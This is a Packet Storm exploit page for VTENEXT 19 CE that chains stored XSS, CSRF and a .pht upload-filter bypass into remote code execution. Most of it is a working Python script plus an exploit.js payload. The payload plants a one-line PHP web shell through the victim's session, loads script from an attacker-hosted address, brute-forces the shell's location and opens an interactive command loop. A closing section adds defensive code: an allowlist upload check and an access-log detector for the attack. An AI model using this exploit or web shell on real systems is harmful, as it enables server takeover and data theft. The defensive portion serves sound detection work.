VTENEXT 19 CE Remote Code Execution

Published: 11 Sep 2020 00:00:00
Reported by: Marco Ruela
Type: packetstorm
Source: packetstormsecurity.com
Views: 513

VTENEXT 19 CE - Remote Code Execution vulnerability, disclosed and exploited by chaining XSS, unrestricted file upload, and CSRF weaknesses. The scripted exploit sends a mail carrying the XSS payload, waits for a user to open it (which uploads a web shell with that user's session), locates the shell, and runs commands through it.

Related

Reporter     Title                                    Published
Exploit DB   VTENEXT 19 CE - Remote Code Execution    11 Sep 2020 00:00
Prion        Cross site scripting                     14 Sep 2020 20:15
Prion        Cross site request forgery (csrf)        14 Sep 2020 20:15
Prion        Unrestricted file upload                 14 Sep 2020 20:15
Cvelist      CVE-2020-10227                           14 Sep 2020 19:58
Cvelist      CVE-2020-10229                           14 Sep 2020 19:55
Cvelist      CVE-2020-10228                           14 Sep 2020 19:56
NVD          CVE-2020-10227                           14 Sep 2020 20:15
NVD          CVE-2020-10229                           14 Sep 2020 20:15
NVD          CVE-2020-10228                           14 Sep 2020 20:15
```python
#!/usr/bin/python3

# Exploit Title: VTENEXT 19 CE - Remote Code Execution
# Google Dork: n/a
# Date: 2020/09/09
# Exploit Author: Marco Ruela
# Vendor Homepage: https://www.vtenext.com/en/
# Software Link: Vendor removed vulnerable version from sourceforge.net
# Version: 19 CE
# Tested on: Ubuntu 16.04
# CVE : CVE-2020-10227, CVE-2020-10228, CVE-2020-10229

# 2020/03/07 - Disclosed vulnerabilities to vendor
# 2020/03/10 - Vendor committed to fix
# 2020/09/09 - Public disclosure

# This script should be easy enough to follow.
# We string together the three vulnerabilities to get RCE.

# XSS - The "From" field of the VTENEXT Messages module is rendered without
#       encoding, so a crafted sender address injects a <script> tag.
# File Upload - File extensions are checked against $upload_badext in the
#       config file; .pht is not on that list, so it is accepted and is
#       executable by default.
# CSRF - No CSRF protections in place, so the injected script can upload
#       with the victim's session.

# exploit.js needs to be hosted somewhere, IP's need to be replaced.
# check_csrf() tails the Apache access log of the host serving exploit.js,
# so run this script there or change check_csrf() based on your setup.
# run_shell() is a "nice to have".


# content of exploit.js (raw string so the \n and \' survive copy-paste)
r"""
// Uploads a PHP web shell through the Myfiles module from inside the
// victim's authenticated VTENEXT session.
function insertImage() {
  var xhr = new XMLHttpRequest();
  xhr.open('POST','http://192.168.226.168/vtenext19ce/index.php?module=Myfiles&action=MyfilesAjax&file=UploadFile&folderid=&uniqueid=',true);
  xhr.setRequestHeader('Content-type','multipart/form-data; boundary=---------------------------rekt');
  // Content-Length and Referer are forbidden request headers: browsers
  // ignore these two calls and set their own values, which is fine here.
  xhr.setRequestHeader('Content-Length', '248');
  xhr.setRequestHeader('Referer', 'http://172.16.233.146/vtenext19ce/index.php');
  xhr.withCredentials = true;   // include the victim's session cookie
  // Multipart body: the field name file_0 and a .pht filename carrying a
  // one-line PHP shell that runs the x query parameter.
  var body = '-----------------------------rekt\nContent-Disposition: form-data; name="file_0"; filename="shell.pht"\nContent-Type: text/text\n\n<?php system($_GET[\'x\']); ?>\n\n-----------------------------rekt--';

  var aBody = new Uint8Array(body.length);
  for (var i = 0; i < aBody.length; i++)
    aBody[i] = body.charCodeAt(i);
  xhr.send(new Blob([aBody]));
}

insertImage();
"""

import smtplib
import datetime
import requests
import os
import time

base_url = "http://192.168.226.168/vtenext19ce/"

print("[*] CVE-2020-10227, CVE-2020-10228, CVE-2020-10229 - POC")


def build_url():
    # Uploaded files land under storage/home/<userid>/<Year>/<Month>/<weekN>/;
    # N is the week offset of today relative to the first day of the month.
    d = datetime.datetime.today()
    year = str(d.year)
    month = str(d.strftime("%B"))
    week = "week" + str(d.isocalendar()[1] - d.replace(day=1).isocalendar()[1])
    tmp = base_url + "storage/home/1/" + year + "/" + month + "/" + week + "/"
    return tmp


def build_mail():
    # The From header is the XSS injection point; the Messages module renders
    # it unescaped, so the <script> tag fetches exploit.js from our host.
    _from = """'<script src="http://192.168.226.1/exploit.js" onerror=alert(1) >'"""
    _to = "[email protected]"
    _subject = "Important!"
    _body = "While you're reading this, a file is being uploaded to this server."

    msg = "From: " + _from + "\n"
    msg += "To: " + _to + "\n"
    msg += "Subject: " + _subject + "\n\n"
    msg += _body
    return msg


def send_mail():
    msg = build_mail()
    smtp_server = '192.168.226.167'
    smtp_port = 25

    sender = '[email protected]'
    receiver = '[email protected]'

    server = smtplib.SMTP(smtp_server, smtp_port)
    server.sendmail(sender, receiver, msg)
    server.quit()


def check_csrf():
    # Poll our own Apache access log until the victim's browser fetched
    # exploit.js with a VTENEXT page as the referer.
    while True:
        is_there = os.popen('tail -n1 /var/log/apache2/access.log').read()

        if "200" in is_there and "/exploit.js" in is_there and base_url in is_there:
            print("[>] CSRF triggered")
            break
        time.sleep(0.5)


def find_shell():
    # VTENEXT prefixes stored files with a numeric id, so brute-force it.
    print("[>] Locating shell")
    time.sleep(1)
    tmp1 = build_url()
    for i in range(1, 9999):
        url = tmp1 + str(i) + "_shell.pht"
        r = requests.get(url)
        if r.status_code == 200:
            print("[>] Found the shell")
            print("[-] Location: " + url)
            return url
    return None


def run_shell(x):
    print("\n")
    while True:
        cmd = input("shell> ")
        if cmd == "exit":
            break
        # params= URL-encodes the command (spaces, &, etc.) for the x parameter.
        r = requests.get(x, params={"x": cmd})
        print(r.text)


print("[>] Sending email")
send_mail()

print("[-] Waiting for user to open mail")

check_csrf()

shell_location = find_shell()

if shell_location is None:
    print("[!] Shell not found; check build_url() against the storage path")
else:
    run_shell(shell_location)


print("[!] Done!")
```
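The File Upload note in the exploit header says extensions are checked against a `$upload_badext` denylist and that `.pht` is therefore accepted and executed. The block below is an added example, not VTENEXT's code or the exploit author's: it models such a denylist check beside an allowlist check and reports which filenames each one accepts and which of them the web server would execute. The denylist contents are assumed; the claim that `.pht` runs as PHP rests on the mod_php `FilesMatch` pattern shipped in Ubuntu 16.04's php7.0.conf (`.+\.ph(p[3457]?|t|tml)$`), which is recalled from that package rather than taken from the page.

```python
# Added example (not VTENEXT's code): denylist vs allowlist extension checks.
import os
import re

# Assumed denylist in the spirit of $upload_badext; the real list is not on the page.
UPLOAD_BADEXT = {"php", "php3", "php4", "php5", "phtml", "exe", "sh", "pl", "cgi"}

# Allowlist of extensions a document-storage module has a reason to accept (assumed).
UPLOAD_ALLOWED = {"pdf", "png", "jpg", "jpeg", "gif", "txt", "csv", "docx", "xlsx"}

# Pattern mod_php uses on Ubuntu 16.04 (php7.0.conf) to pick files it executes;
# note the "t" alternative, which is what makes .pht a live PHP file.
PHP_EXECUTED = re.compile(r".+\.ph(p[3457]?|t|tml)$", re.IGNORECASE)


def blacklist_allows(filename: str) -> bool:
    """Denylist check as the page describes it: reject only a listed last extension."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext not in UPLOAD_BADEXT


def allowlist_allows(filename: str) -> bool:
    """Stricter check: drop any path, require exactly one extension that is on the
    allowlist, and as a second layer refuse anything the server would execute."""
    name = os.path.basename(filename.replace("\\", "/"))
    parts = name.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False            # no extension, dotfile, or double extension
    if parts[1] not in UPLOAD_ALLOWED:
        return False
    return PHP_EXECUTED.match(name) is None


def server_executes(filename: str) -> bool:
    """Would the default mod_php configuration run this file as PHP?"""
    return PHP_EXECUTED.match(filename) is not None


def audit(filenames):
    """Map each name to (denylist verdict, allowlist verdict, executed by server)."""
    return {f: (blacklist_allows(f), allowlist_allows(f), server_executes(f))
            for f in filenames}


# Constructed sample names: the page's shell plus common bypass variants.
SAMPLES = ["shell.pht", "shell.php", "shell.PhP5", "shell.phtml", "shell.php.jpg",
           "report.pdf", "photo.JPG", "..\\..\\evil.pdf", ".htaccess"]

if __name__ == "__main__":
    print(f"{'filename':18} denylist  allowlist  executed")
    for name, (bl, al, ex) in audit(SAMPLES).items():
        print(f"{name:18} {bl!s:9} {al!s:10} {ex}")
```

The denylist accepts `shell.pht` and the server runs it, which is the combination the exploit depends on; the allowlist refuses it even before the execution check is consulted.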

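check_csrf() above watches only the attacker's own web log. As an added example that is not from the page or the VTENEXT project, here is the defender's side: a scan over Apache combined-format access log lines of the VTENEXT host that flags the three stages the chain leaves behind (a Myfiles upload POST issued from a page of a different module, the burst of 404s under storage/ that find_shell() produces, and 200s on an executable file under storage/). The host address, paths, threshold and every log line are constructed for the example.

```python
# Added example (not from the page or the project): detect the upload/sweep/shell
# pattern in Apache combined-format logs of the VTENEXT host.
import re
from collections import Counter

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

APP_HOST = "192.168.226.168"                 # VTENEXT host used in the exploit (assumed)
UPLOAD_MARKER = "module=Myfiles&action=MyfilesAjax&file=UploadFile"
EXEC_IN_STORAGE = re.compile(r"^/.*/storage/.*\.ph(p[3457]?|t|tml)(\?.*)?$", re.IGNORECASE)
SCAN_THRESHOLD = 5                           # 404s per IP under storage/ before calling it a sweep


def parse(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def referer_module(referer):
    """VTENEXT module named in a referer URL; None if the referer is not a page on APP_HOST."""
    if not re.match(r"https?://" + re.escape(APP_HOST) + "/", referer):
        return None
    m = re.search(r"[?&]module=([A-Za-z0-9_]+)", referer)
    return m.group(1) if m else ""


def analyse(lines):
    findings = {"csrf_upload": [], "webshell_hit": [], "storage_sweep": []}
    misses = Counter()
    for line in lines:
        e = parse(line)
        if e is None:
            continue
        if e["method"] == "POST" and UPLOAD_MARKER in e["path"]:
            # A Myfiles upload is normally issued from the Myfiles page. One issued
            # from another module's page (the Messages view the XSS runs in), from
            # off-host, or with no referer is the injected upload.
            if referer_module(e["referer"]) != "Myfiles":
                findings["csrf_upload"].append((e["ip"], e["ts"], e["referer"]))
        if EXEC_IN_STORAGE.match(e["path"]):
            if e["status"] == "200":
                findings["webshell_hit"].append((e["ip"], e["ts"], e["path"]))
            elif e["status"] == "404":
                misses[e["ip"]] += 1
    for ip, n in misses.items():
        if n >= SCAN_THRESHOLD:
            findings["storage_sweep"].append((ip, n))
    return findings


# Constructed log lines: victim 192.168.226.50 opens the mail, the injected
# upload fires, then the attacker at 192.168.226.1 sweeps for and uses the shell.
# A later legitimate upload from the Myfiles page is included as a control.
_STORE = "/vtenext19ce/storage/home/1/2020/September/week1/"
_UP = "/vtenext19ce/index.php?" + UPLOAD_MARKER + "&folderid=&uniqueid="
_REF = "http://192.168.226.168/vtenext19ce/index.php?module="
SAMPLE_LOG = [
    f'192.168.226.50 - - [09/Sep/2020:10:14:02 +0000] "GET /vtenext19ce/index.php?module=Messages&action=DetailView&record=12 HTTP/1.1" 200 8123 "{_REF}Messages" "Mozilla/5.0"',
    f'192.168.226.50 - - [09/Sep/2020:10:14:03 +0000] "POST {_UP} HTTP/1.1" 200 57 "{_REF}Messages&action=DetailView&record=12" "Mozilla/5.0"',
] + [
    f'192.168.226.1 - - [09/Sep/2020:10:14:05 +0000] "GET {_STORE}{i}_shell.pht HTTP/1.1" 404 212 "-" "python-requests/2.24.0"'
    for i in range(1, 6)
] + [
    f'192.168.226.1 - - [09/Sep/2020:10:14:06 +0000] "GET {_STORE}6_shell.pht HTTP/1.1" 200 0 "-" "python-requests/2.24.0"',
    f'192.168.226.1 - - [09/Sep/2020:10:14:09 +0000] "GET {_STORE}6_shell.pht?x=id HTTP/1.1" 200 54 "-" "python-requests/2.24.0"',
    f'192.168.226.50 - - [09/Sep/2020:10:20:00 +0000] "POST {_UP} HTTP/1.1" 200 57 "{_REF}Myfiles&action=index" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for kind, hits in analyse(SAMPLE_LOG).items():
        for hit in hits:
            print(kind, hit)
```

The referer heuristic is deliberately conservative: it flags an upload that came from a page of the wrong module, which is exactly how the XSS-driven request looks, while leaving uploads from the Myfiles page alone. The 404 sweep is the noisiest signal of the three and is usually what shows up first.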